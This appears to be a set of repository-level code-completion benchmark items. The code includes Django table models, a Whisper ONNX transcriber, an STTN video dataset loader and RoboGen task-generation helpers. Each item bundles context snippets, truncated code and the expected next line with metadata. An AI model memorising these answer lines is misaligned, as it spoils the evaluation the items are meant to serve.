cell_value = value.get(table_column.column_name, "")
cell = CellValue.objects.create(
value=cell_value, table=self,
table_column=table_column,
table_row=table_row
)
row.append(cell)
# add cell to column
table_column.column_cells.add(cell)
# add cell to row
table_row.row_cells.add(*row)
# add row to table
self.table_rows.add(table_row)
return table_row
def bulk_add_rows(self, values: Sequence[dict]) -> list:
if not isinstance(values, (list, tuple, set)):
raise ValueError('values must be a sequence of dict')
rows = []
for row in values:
if not isinstance(row, dict):
raise ValueError('values must be a sequence of dict')
if self.__total_table_columns() == 0:
raise TableHaveNoColumn()
rows.append(self.add_row(row))
return rows
def delete_column(self, column_name):
# using get instead of filter if for some reason the unique parameter
# was disabled in the table column definition, this will doubly ensure
# that the field are unique else it will always raise an error if it
# encounter duplicates column names
if not isinstance(column_name, str):
raise ValueError('column_name must be a str')
try:
column = self.table_columns.get(column_name=column_name)
except TableColumn.MultipleObjectsReturned:
raise DuplicateColumnInTable()
except TableColumn.DoesNotExist:
raise ColumnNotInTable()
else:
# remove column from the table
self.table_columns.remove(column)
# delete the removed column and all the cells associated with it
column.delete()
return column
def delete_row(self, row_index=None):
"""if row_index is None remove the last row"""
if not isinstance(row_index, (int, type(None))):
raise TypeError("Row index value must be an integer")
try:
if row_index is None:
row = self.table_rows.last()
else:
row = self.table_rows.get(pk=row_index)
except TableRow.DoesNotExist:
raise RowNotInTable()
else:
# remove row from the table
self.table_rows.remove(row)
# delete the removed row and all the cells associated with it
row.delete()
return row
def get_cell(self, column_name, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
if not self.is_column(column_name):
raise ColumnNotInTable()
try:
cell = CellValue.objects.get(
table=self,
table_column__column_name=column_name,
table_row_id=row_index
)
return cell
except CellValue.DoesNotExist:
raise CellDoesNotExist
def get_column_cells(self, column_name):
if not self.is_column(column_name):
raise ColumnNotInTable()
column = TableColumn.objects.get(table=self, column_name=column_name)
column_cells = column.column_cells.all()
return list(column_cells)
def get_row_cells(self, row_index):
if isinstance(row_index, str):
row_index = int(row_index)
try:
row = TableRow.objects.get(table=self, id=row_index)
row_cells = row.row_cells.all()
except TableRow.DoesNotExist:
raise RowNotInTable()
return list(row_cells)
class TableColumn(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
column_name = models.CharField(max_length=255, unique=True)
column_data_type = models.CharField(max_length=15, choices=__SUPPORTED_DATA_TYPE_CHOICES__)
column_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.column_name}: {self.column_data_type} -- {self.table}"
def _get_column_values(self):
return self.column_cells.all()
class TableRow(models.Model):
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
row_cells = models.ManyToManyField('CellValue', blank=True)
def __str__(self):
return f"{self.table} Table: Row no. {self.id}"
def to_dict(self):
values = {
item.column.column_name: item.value
for item in self.row_cells.all()
}
return values
class CellValue(models.Model):
"""Synonymous with the cell in a spreadsheet, it contains the value of the
table along with relevant information about it position in the table"""
value = models.TextField(blank=True)
table = models.ForeignKey(DynamicTable, on_delete=models.CASCADE)
table_column = models.ForeignKey(TableColumn, on_delete=models.CASCADE)
table_row = models.ForeignKey(TableRow, blank=True, on_delete=models.CASCADE)
def __str__(self):
return self.value
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
self.full_clean()
super(CellValue, self).save()
def clean(self):
super(CellValue, self).clean()
self.__validate_data_type__(self.value, self.table_column.column_data_type)
def __validate_data_type__(self, value, data_type):
"""
Ensures that the values is saved in the database in the format that
can be easily be converted to the desired data type
"""
if data_type == 'char' or data_type == 'textfield':
self.value = str(value)
elif data_type == 'int':
if not isinstance(value, int):
try:
if value:
self.value = int(float(value))
else:
self.value = ""
except ValueError:
| raise CantParseValueToDataType(f"{value} to {data_type}")
| 7 | 2023-12-19 15:50:38+00:00 | 4k |
mohame54/Speech-Transcriber-App | whisper/whisper.py | [
{
"identifier": "Inference",
"path": "whisper/decoding.py",
"snippet": "class Inference:\n \"\"\"\n Class for handling sequence generation inference.\n\n Attributes:\n encoder: ONNX runtime inference session for the encoder.\n decoder: ONNX runtime inference session for the decoder.\n _mode: Language mode (\"English\" or \"Arabic\").\n \"\"\"\n def __init__(\n self,\n encoder_path: str,\n decoder_path: str,\n mode: Optional[str] = \"English\"\n ):\n \"\"\"\n Initializes the Inference instance.\n\n Parameters:\n encoder_path: Path to the encoder model.\n decoder_path: Path to the decoder model.\n mode: Language mode (\"English\" or \"Arabic\").\n \"\"\"\n options = onnxruntime.SessionOptions()\n providers = [\"CPUExecutionProvider\"]\n options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL\n self.encoder = onnxruntime.InferenceSession(\n encoder_path, sess_options=options, providers=providers)\n self.decoder = onnxruntime.InferenceSession(\n decoder_path, sess_options=options, providers=providers)\n self._mode = mode\n self.reset()\n \n def reset(self):\n self.cross_k_cache = None\n self.cross_v_cache = None\n\n def encode(self, feats):\n _, cross_k_cache, cross_v_cache = self.encoder.run(None, {\"mel\":feats}) \n self.cross_k_cache = cross_k_cache\n self.cross_v_cache = cross_v_cache\n\n def get_inits(self):\n lang_id = ENGLISH_ID if self._mode == \"English\" else ARABIC_ID\n k_caches = np.zeros((6, 1, 8, 1, 64)).astype(np.float32)\n v_caches = np.zeros((6, 1, 8, 1, 64)).astype(np.float32)\n tokens = [50258, lang_id, 50359, 50363]\n hyp: Hypothesis = Hypothesis(\n tokens,\n k_caches,\n v_caches,\n )\n return hyp \n\n def set_mode(self, mode: str):\n self._mode = mode \n\n def __call__(\n self,\n hyp: Hypothesis,\n initial: Optional[bool] = False,\n ) -> Tuple[np.ndarray]:\n \"\"\"\n Generates logits for the given hypothesis using the encoder and decoder.\n\n Parameters:\n hyp: The hypothesis.\n initial: Whether it's the initial generation or not.\n\n Returns:\n np.ndarray: Logits for the hypothesis.\n np.ndarray: keys caches for inference.\n np.ndarray: values caches for inference.\n \"\"\"\n if initial:\n tokens = np.array(hyp.tokens)\n else:\n tokens = np.array([hyp.tokens[-1]]) \n tokens = np.expand_dims(tokens, axis=0).astype(np.int32)\n ort_inputs = {\n \"tokens\":tokens,\n \"self_k_caches\":hyp.k_caches,\n \"self_v_caches\":hyp.v_caches,\n \"cross_k_caches\":self.cross_k_cache,\n \"cross_v_caches\":self.cross_v_cache,\n } \n outs = self.decoder.run(None, ort_inputs) \n # update the internal variables\n # update the k an v states \n k_caches = outs[1] \n v_caches = outs[2]\n return (outs[0][:, -1: ,:]).squeeze(), k_caches, v_caches "
},
{
"identifier": "GreedyDecoding",
"path": "whisper/decoding.py",
"snippet": "class GreedyDecoding(Decoding):\n \"\"\"\n Greedy decoding strategy for sequence generation.\n\n Attributes:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n temperature: Temperature parameter for softmax.\n top_p: Top-p sampling parameter.\n \"\"\"\n\n def __init__(\n self,\n inference,\n eos_id,\n temperature=0.9,\n top_p=0.95\n ):\n \"\"\"\n Initializes the GreedyDecoding instance.\n\n Parameters:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n temperature (float): Temperature parameter for softmax.\n top_p (float): Top-p sampling parameter.\n \"\"\"\n super().__init__(inference)\n self.eos_id = eos_id\n self.temperature = temperature\n self.top_p = top_p\n\n def update(self, logits: np.ndarray, hyp: Hypothesis):\n \"\"\"\n Updates a hypothesis based on logits using the greedy decoding strategy.\n\n Parameters:\n logits: The logits from the model.\n hyp: The hypothesis.\n\n Returns:\n Hypothesis: Updated hypothesis.\n \"\"\"\n logits = logits.reshape(-1,)\n if self.temperature == 0 or self.temperature == 1.0:\n next_token = logits.argmax(axis=-1)\n else:\n probs = softmax(logits / self.temperature)\n next_token = sample_top_p(probs, self.top_p)\n logprobs = log_softmax(logits)[next_token]\n hyp.logprob += logprobs\n if next_token == self.eos_id:\n hyp.is_done = True\n hyp.tokens.append(next_token)\n return hyp\n\n def __call__(\n self,\n audio_feats:np.ndarray,\n max_len:int=50,\n return_multiple:bool=False\n ) -> List[Hypothesis]:\n \"\"\"\n Performs greedy decoding on audio features.\n\n Parameters:\n audio_feats (numpy array): Audio features.\n max_len (int): Maximum length of the generated sequence.\n return_multiple (bool): Whether to return multiple hypotheses or the best one.\n\n Returns:\n Hypothesis: Generated hypothesis.\n \"\"\"\n self.reset()\n self.inference.encode(audio_feats)\n hyp: Hypothesis = self.inference.get_inits()\n for i in range(1, max_len):\n is_initial = i == 1\n # Retrive the current logits and k_caches and v_caches\n logits, k_cahces, v_caches = self.inference(hyp, initial=is_initial)\n # Update the Hypothesis k_cahces, v_caches \n hyp.k_caches = k_cahces\n hyp.v_caches = v_caches\n hyp = self.update(logits, hyp)\n if hyp.is_done:\n break\n # Release keys and values caches. \n hyp.k_caches = None\n hyp.v_caches = None \n return hyp"
},
{
"identifier": "BeamSearchDecoding",
"path": "whisper/decoding.py",
"snippet": "class BeamSearchDecoding(Decoding):\n \"\"\"\n Beam search decoding strategy for sequence generation.\n\n Attributes:\n inference: The inference instance.\n eos_id: End-of-sequence token ID.\n beam_size: Size of the beam.\n length_penalty: Length penalty factor.\n \"\"\"\n\n def __init__(\n self,\n inference,\n eos_id: int,\n beam_size: int = 3,\n length_penalty: float = 1,\n top_p=0.95,\n temperature=1.0,\n ):\n \"\"\"\n Initializes the BeamSearchDecoding instance.\n\n Parameters:\n inference: The inference instance.\n eos_id (int): End-of-sequence token ID.\n beam_size (int): Size of the beam.\n length_penalty (float): Length penalty factor.\n \"\"\"\n super().__init__(inference)\n self.eos_id = eos_id\n self.beam_size = beam_size\n self.length_penalty = MaximumLikelihoodRanker(length_penalty)\n self.temperature = temperature\n self.top_p = top_p\n\n def update(\n self,\n hyps: List[Hypothesis],\n initial: bool = False,\n ):\n \"\"\"\n Updates hypotheses based on logits using the beam search strategy.\n\n Parameters:\n hyps: List of hypotheses.\n initial: Whether it's the initial hyp or not.\n\n Returns:\n List[Hypothesis]: Updated hypotheses.\n \"\"\"\n new_beam = []\n\n for hyp in hyps:\n if hyp.is_done:\n # If the hypothesis is already completed, keep it in the beam\n new_beam.append(hyp)\n continue\n\n # Get logits for the current hypothesis\n logits, k_caches, v_caches = self.inference(hyp, initial=initial)\n # Apply greedy decode or top p sampling to get the top beam_width candidates\n if self.temperature > 0.0 and self.temperature != 1.0:\n probs = softmax(logits / self.temperature)\n top_indices = sample_top_p(probs, self.top_p, size=self.beam_size)\n else:\n top_indices = np.argsort(logits)[::-1][:self.beam_size] \n # Apply log softmax normalize then calculate \n logits = logits - logits.max(axis=-1) \n sum_logits = np.log(np.sum(np.exp(logits)))\n for idx in top_indices:\n # Create a new hypothesis by extending the current one\n new_tokens = hyp.tokens + [idx]\n #Calculate the log probability\n new_logprob = hyp.logprob + (logits[idx] - sum_logits)\n new_is_done = (idx == self.eos_id)\n # Add the new hypothesis to the beam\n new_beam.append(\n Hypothesis(\n tokens=new_tokens,\n k_caches=k_caches,\n v_caches=v_caches,\n logprob=new_logprob,\n is_done=new_is_done\n )\n )\n\n # Sort the beam based on log probabilities\n new_beam = sorted(new_beam, key=lambda h: h.logprob, reverse=True)\n return new_beam[:self.beam_size]\n\n def __call__(\n self,\n audio_feats: np.ndarray,\n max_len: int = 50,\n return_multiple: bool=False\n ) -> List[Hypothesis]:\n \"\"\"\n Performs beam search decoding on audio features.\n\n Parameters:\n audio_feats (numpy array): Audio features.\n max_len (int): Maximum length of the generated sequence.\n return_multiple (bool): Whether to return multiple hypotheses or the best one.\n\n Returns:\n Hypothesis or List[Hypothesis]: Generated hypothesis or hypotheses.\n \"\"\"\n self.reset()\n self.inference.encode(audio_feats)\n beam: List[Hypothesis] = [self.inference.get_inits()]\n for i in range(1, max_len):\n is_initial = i == 1\n beam = self.update(\n beam,\n initial=is_initial\n )\n if any(h.is_done for h in beam):\n break\n beam = self.finalize(beam)\n if not return_multiple:\n best_idx = self.length_penalty.rank(beam)\n beam = beam[best_idx]\n return beam\n \n def finalize(self, hyps: List[Hypothesis]):\n \"\"\"\n Finalizes the decoding process by appending end-of-sequence tokens to hypotheses.\n\n Parameters:\n hyps: List of hypotheses.\n\n 
Returns:\n List[Hypothesis]: Finalized hypotheses.\n \"\"\"\n for i in range(len(hyps)):\n hyps[i].k_caches = None\n hyps[i].v_caches = None\n if hyps[i].tokens[-1] != self.eos_id:\n hyps[i].tokens.append(self.eos_id)\n return hyps"
},
{
"identifier": "Hypothesis",
"path": "whisper/decoding.py",
"snippet": "class Hypothesis:\n \"\"\"\n Represents a hypothesis in sequence generation.\n\n Attributes:\n tokens (List[int]): List of tokens in the hypothesis.\n k_caches (np.ndarray): key caches for inference.\n v_caches (np.ndarray): value caches for inference.\n logprob (float): Log probability of the hypothesis.\n is_done (bool): Indicates whether the hypothesis is complete.\n \"\"\"\n tokens: List[int]\n k_caches: Optional[np.ndarray] = None\n v_caches: Optional[np.ndarray] = None\n logprob: float = 0.0\n is_done: bool = False"
}
] | from typing import Literal, Union, Tuple, Optional, List
from transformers import WhisperFeatureExtractor, WhisperTokenizer
from dataclasses import dataclass
from .decoding import Inference, GreedyDecoding, BeamSearchDecoding, Hypothesis
import soxr
import soundfile as sf
import numpy as np
import wget
import os | 3,532 |
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy":
|
# LOCAL
@dataclass
class WhisperConfig:
"""
Configuration class for the WhisperInference module.
Attributes:
- encoder_path: Path to the encoder model.
- decoder_path: Path to the decoder model.
- model_id: Model identifier, default is "openai/whisper-base" this is the only one supported for now.
- transcribption_mode: Language mode, default is "English".
- decoding: Decoding mode, default is "greedy".
- beam_size: Beam size for beam search decoding, default is 5.
- eos_id: End-of-sequence token ID, default is 50257.
- temperature: Temperature for decoding, default is 1.0.
- top_p: Top-p sampling parameter, default is 0.98.
- length_penalty: Length penalty for beam search decoding, default is 2.0.
"""
encoder_path: str
decoder_path: str
model_id: str = "openai/whisper-base"
transcribption_mode: Literal["English", "Arabic"] = "English"
decoding: Literal["greedy", "beam"] = "greedy"
beam_size: int = 5
eos_id: int = 50257
temperature: float = 1.0
top_p: float = 0.98
length_penalty: float = 2.0
class WhisperInference:
"""
Inference module for transcribing audio using the Whisper model.
Attributes:
- processor: WhisperFeatureExtractor for extracting features from audio.
- tokenizer: WhisperTokenizer for tokenizing transcriptions.
- decoding: Decoding strategy based on the selected mode.
"""
def __init__(
self,
config: WhisperConfig
):
"""
Initializes the WhisperInference module.
Args:
- config: WhisperConfig object containing model configuration.
"""
# Initialize feature extractor and tokenizer
self.processor = WhisperFeatureExtractor.from_pretrained(config.model_id)
self.tokenizer = WhisperTokenizer.from_pretrained(
config.model_id,
language=config.transcribption_mode,
task="transcribe",
)
self.config = config
self.inference = Inference(
self.config.encoder_path,
self.config.decoder_path,
self.config.transcribption_mode,
)
self.set_decoding()
def set_decoding(self, decoding: Optional[str]= None):
# Initialize inference and decoding strategy based on the selected mode
decoding = decoding if decoding is not None else self.config.decoding
if decoding == "greedy": | self.decoding = GreedyDecoding( | 1 | 2023-12-16 13:35:51+00:00 | 4k |
YaoFANGUK/video-subtitle-remover | backend/tools/train/dataset_sttn.py | [
{
"identifier": "ZipReader",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class ZipReader(object):\n file_dict = dict()\n\n def __init__(self):\n super(ZipReader, self).__init__()\n\n @staticmethod\n def build_file_dict(path):\n file_dict = ZipReader.file_dict\n if path in file_dict:\n return file_dict[path]\n else:\n file_handle = zipfile.ZipFile(path, 'r')\n file_dict[path] = file_handle\n return file_dict[path]\n\n @staticmethod\n def imread(path, image_name):\n zfile = ZipReader.build_file_dict(path)\n data = zfile.read(image_name)\n im = Image.open(io.BytesIO(data))\n return im"
},
{
"identifier": "create_random_shape_with_random_motion",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "def create_random_shape_with_random_motion(video_length, imageHeight=240, imageWidth=432):\n # get a random shape\n height = random.randint(imageHeight//3, imageHeight-1)\n width = random.randint(imageWidth//3, imageWidth-1)\n edge_num = random.randint(6, 8)\n ratio = random.randint(6, 8)/10\n region = get_random_shape(\n edge_num=edge_num, ratio=ratio, height=height, width=width)\n region_width, region_height = region.size\n # get random position\n x, y = random.randint(\n 0, imageHeight-region_height), random.randint(0, imageWidth-region_width)\n velocity = get_random_velocity(max_speed=3)\n m = Image.fromarray(np.zeros((imageHeight, imageWidth)).astype(np.uint8))\n m.paste(region, (y, x, y+region.size[0], x+region.size[1]))\n masks = [m.convert('L')]\n # return fixed masks\n if random.uniform(0, 1) > 0.5:\n return masks*video_length\n # return moving masks\n for _ in range(video_length-1):\n x, y, velocity = random_move_control_points(\n x, y, imageHeight, imageWidth, velocity, region.size, maxLineAcceleration=(3, 0.5), maxInitSpeed=3)\n m = Image.fromarray(\n np.zeros((imageHeight, imageWidth)).astype(np.uint8))\n m.paste(region, (y, x, y+region.size[0], x+region.size[1]))\n masks.append(m.convert('L'))\n return masks"
},
{
"identifier": "Stack",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class Stack(object):\n def __init__(self, roll=False):\n self.roll = roll\n\n def __call__(self, img_group):\n mode = img_group[0].mode\n if mode == '1':\n img_group = [img.convert('L') for img in img_group]\n mode = 'L'\n if mode == 'L':\n return np.stack([np.expand_dims(x, 2) for x in img_group], axis=2)\n elif mode == 'RGB':\n if self.roll:\n return np.stack([np.array(x)[:, :, ::-1] for x in img_group], axis=2)\n else:\n return np.stack(img_group, axis=2)\n else:\n raise NotImplementedError(f\"Image mode {mode}\")"
},
{
"identifier": "ToTorchFormatTensor",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class ToTorchFormatTensor(object):\n \"\"\" Converts a PIL.Image (RGB) or numpy.ndarray (H x W x C) in the range [0, 255]\n to a torch.FloatTensor of shape (C x H x W) in the range [0.0, 1.0] \"\"\"\n\n def __init__(self, div=True):\n self.div = div\n\n def __call__(self, pic):\n if isinstance(pic, np.ndarray):\n # numpy img: [L, C, H, W]\n img = torch.from_numpy(pic).permute(2, 3, 0, 1).contiguous()\n else:\n # handle PIL Image\n img = torch.ByteTensor(\n torch.ByteStorage.from_buffer(pic.tobytes()))\n img = img.view(pic.size[1], pic.size[0], len(pic.mode))\n # put it from HWC to CHW format\n # yikes, this transpose takes 80% of the loading time/CPU\n img = img.transpose(0, 1).transpose(0, 2).contiguous()\n img = img.float().div(255) if self.div else img.float()\n return img"
},
{
"identifier": "GroupRandomHorizontalFlip",
"path": "backend/tools/train/utils_sttn.py",
"snippet": "class GroupRandomHorizontalFlip(object):\n \"\"\"Randomly horizontally flips the given PIL.Image with a probability of 0.5\n \"\"\"\n\n def __init__(self, is_flow=False):\n self.is_flow = is_flow\n\n def __call__(self, img_group, is_flow=False):\n v = random.random()\n if v < 0.5:\n ret = [img.transpose(Image.FLIP_LEFT_RIGHT) for img in img_group]\n if self.is_flow:\n for i in range(0, len(ret), 2):\n # invert flow pixel values when flipping\n ret[i] = ImageOps.invert(ret[i])\n return ret\n else:\n return img_group"
}
] | import os
import json
import random
import torch
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from backend.tools.train.utils_sttn import ZipReader, create_random_shape_with_random_motion
from backend.tools.train.utils_sttn import Stack, ToTorchFormatTensor, GroupRandomHorizontalFlip | 1,934 |
# Custom dataset
class Dataset(torch.utils.data.Dataset):
    def __init__(self, args: dict, split='train', debug=False):
        # Initializer: takes the config dict and the dataset split type, default 'train'
        self.args = args
        self.split = split
        self.sample_length = args['sample_length'] # sample length parameter
        self.size = self.w, self.h = (args['w'], args['h']) # target image width and height
        # open the json file that stores the dataset metadata
        with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
            self.video_dict = json.load(f) # load the json file contents
        self.video_names = list(self.video_dict.keys()) # get the list of video names
        if debug or split != 'train': # in debug mode or for non-training splits, keep only the first 100 videos
            self.video_names = self.video_names[:100]
        # define the data transforms that stack frames into tensors
        self._to_tensors = transforms.Compose([
            Stack(),
            ToTorchFormatTensor(), # tensor format convenient for use in PyTorch
        ])
    def __len__(self):
        # return the number of videos in the dataset
        return len(self.video_names)
    def __getitem__(self, index):
        # fetch a single sample item
        try:
            item = self.load_item(index) # try to load the item at the given index
        except:
            print('Loading error in video {}'.format(self.video_names[index])) # print an error message if loading fails
            item = self.load_item(0) # fall back to loading the first item
        return item
    def load_item(self, index):
        # concrete implementation of loading a data item
        video_name = self.video_names[index] # get the video name by index
        # generate the list of frame file names for all video frames
        all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
        # generate randomly shaped masks with random motion
        all_masks = create_random_shape_with_random_motion(
            len(all_frames), imageHeight=self.h, imageWidth=self.w)
        # get the indices of the reference frames
        ref_index = get_ref_index(len(all_frames), self.sample_length)
        # read the video frames
        frames = []
        masks = []
        for idx in ref_index:
            # read the image, convert to RGB, resize, and append to the list
|
# Custom dataset
class Dataset(torch.utils.data.Dataset):
    def __init__(self, args: dict, split='train', debug=False):
        # Initializer: takes the config dict and the dataset split type, default 'train'
        self.args = args
        self.split = split
        self.sample_length = args['sample_length'] # sample length parameter
        self.size = self.w, self.h = (args['w'], args['h']) # target image width and height
        # open the json file that stores the dataset metadata
        with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
            self.video_dict = json.load(f) # load the json file contents
        self.video_names = list(self.video_dict.keys()) # get the list of video names
        if debug or split != 'train': # in debug mode or for non-training splits, keep only the first 100 videos
            self.video_names = self.video_names[:100]
        # define the data transforms that stack frames into tensors
        self._to_tensors = transforms.Compose([
            Stack(),
            ToTorchFormatTensor(), # tensor format convenient for use in PyTorch
        ])
    def __len__(self):
        # return the number of videos in the dataset
        return len(self.video_names)
    def __getitem__(self, index):
        # fetch a single sample item
        try:
            item = self.load_item(index) # try to load the item at the given index
        except:
            print('Loading error in video {}'.format(self.video_names[index])) # print an error message if loading fails
            item = self.load_item(0) # fall back to loading the first item
        return item
    def load_item(self, index):
        # concrete implementation of loading a data item
        video_name = self.video_names[index] # get the video name by index
        # generate the list of frame file names for all video frames
        all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
        # generate randomly shaped masks with random motion
        all_masks = create_random_shape_with_random_motion(
            len(all_frames), imageHeight=self.h, imageWidth=self.w)
        # get the indices of the reference frames
        ref_index = get_ref_index(len(all_frames), self.sample_length)
        # read the video frames
        frames = []
        masks = []
        for idx in ref_index:
            # read the image, convert to RGB, resize, and append to the list | img = ZipReader.imread('{}/{}/JPEGImages/{}.zip'.format( | 0 | 2023-10-25 02:50:01+00:00 | 4k
Genesis-Embodied-AI/RoboGen | gpt_4/prompts/prompt_manipulation.py | [
{
"identifier": "partnet_mobility_dict",
"path": "objaverse_utils/utils.py",
"snippet": ""
},
{
"identifier": "build_task_given_text",
"path": "gpt_4/prompts/utils.py",
"snippet": "def build_task_given_text(object_category, task_name, task_description, additional_object, involved_links, involved_joints, \n articulation_tree_filled, semantics_filled, object_path, save_folder, temperature_dict, model_dict=None):\n if model_dict is None:\n model_dict = {\n \"task_generation\": \"gpt-4\",\n \"reward\": \"gpt-4\",\n \"yaml\": \"gpt-4\",\n \"size\": \"gpt-4\",\n \"joint\": \"gpt-4\",\n \"spatial_relationship\": \"gpt-4\"\n }\n\n task_yaml_config_prompt_filled = copy.deepcopy(task_yaml_config_prompt)\n if additional_object.lower() == \"none\":\n task_object = object_category\n else:\n task_object = \"{}, {}\".format(object_category, additional_object)\n task_yaml_config_prompt_filled = task_yaml_config_prompt_filled.format(task_name, task_description, task_object)\n task_yaml_config_prompt_filled += articulation_tree_filled + semantics_filled\n\n system = \"You are a helpful assistant.\"\n save_path = os.path.join(save_folder, \"gpt_response/task_yaml_config_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating task yaml config\", \"=\" * 20)\n print(\"=\" * 50)\n task_yaml_response = query(system, [task_yaml_config_prompt_filled], [], save_path=save_path, debug=False, \n temperature=temperature_dict[\"yaml\"], model=model_dict[\"yaml\"])\n # NOTE: parse the yaml file and generate the task in the simulator.\n description = f\"{task_name}_{task_description}\".replace(\" \", \"_\").replace(\".\", \"\").replace(\",\", \"\")\n task_yaml_response = task_yaml_response.split(\"\\n\")\n size_save_path = os.path.join(save_folder, \"gpt_response/size_{}.json\".format(task_name))\n parsed_yaml, save_name = parse_response_to_get_yaml(task_yaml_response, description, save_path=size_save_path, \n temperature=temperature_dict[\"size\"], model=model_dict[\"size\"])\n\n # NOTE: post-process such that articulated object is urdf.\n # NOTE: post-process to include the reward asset path for reward generation. 
\n for obj in parsed_yaml:\n if \"name\" in obj and obj['name'] == object_category:\n obj['type'] = 'urdf'\n obj['reward_asset_path'] = object_path\n\n # config_path = \"gpt_4/data/parsed_configs_semantic_articulated/{}-{}\".format(object_category, time_string)\n config_path = save_folder\n with open(os.path.join(config_path, save_name), 'w') as f:\n yaml.dump(parsed_yaml, f, indent=4)\n\n input_to_reward_config = copy.deepcopy(parsed_yaml)\n for obj in input_to_reward_config:\n if \"reward_asset_path\" in obj:\n input_to_reward_config.remove(obj)\n initial_config = yaml.safe_dump(parsed_yaml)\n\n ### decompose and generate reward\n yaml_file_path = os.path.join(config_path, save_name)\n reward_save_path = os.path.join(save_folder, \"gpt_response/reward_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating reward\", \"=\" * 20)\n print(\"=\" * 50)\n solution_path = decompose_and_generate_reward_or_primitive(task_name, task_description, initial_config, \n articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, object_path, \n yaml_file_path, save_path=reward_save_path,\n temperature=temperature_dict[\"reward\"],\n model=model_dict[\"reward\"])\n \n\n ### generate joint angle\n save_path = os.path.join(save_folder, \"gpt_response/joint_angle_{}.json\".format(task_name))\n substep_file_path = os.path.join(solution_path, \"substeps.txt\")\n with open(substep_file_path, 'r') as f:\n substeps = f.readlines()\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating initial joint angle\", \"=\" * 20)\n print(\"=\" * 50)\n joint_angle_values = query_joint_angle(task_name, task_description, articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, substeps, save_path=save_path, \n temperature=temperature_dict['joint'], model=model_dict[\"joint\"])\n joint_angle_values[\"set_joint_angle_object_name\"] = object_category\n\n involved_objects = []\n config = yaml.safe_load(initial_config)\n for obj in config:\n if \"name\" in obj:\n involved_objects.append(obj[\"name\"])\n involved_objects = \", \".join(involved_objects)\n save_path = os.path.join(save_folder, \"gpt_response/spatial_relationships_{}.json\".format(task_name))\n print(\"=\" * 50)\n print(\"=\" * 20, \"generating initial spatial relationship\", \"=\" * 20)\n print(\"=\" * 50)\n spatial_relationships = query_spatial_relationship(task_name, task_description, involved_objects, articulation_tree_filled, semantics_filled, \n involved_links, involved_joints, substeps, save_path=save_path, \n temperature=temperature_dict['spatial_relationship'], model=model_dict[\"spatial_relationship\"])\n\n config.append(dict(solution_path=solution_path))\n config.append(joint_angle_values)\n config.append(dict(spatial_relationships=spatial_relationships))\n config.append(dict(task_name=task_name, task_description=task_description))\n with open(os.path.join(config_path, save_name), 'w') as f:\n yaml.dump(config, f, indent=4)\n with open(os.path.join(solution_path, \"config.yaml\"), 'w') as f:\n yaml.dump(config, f, indent=4)\n\n return os.path.join(config_path, save_name)"
},
{
"identifier": "parse_task_response",
"path": "gpt_4/prompts/utils.py",
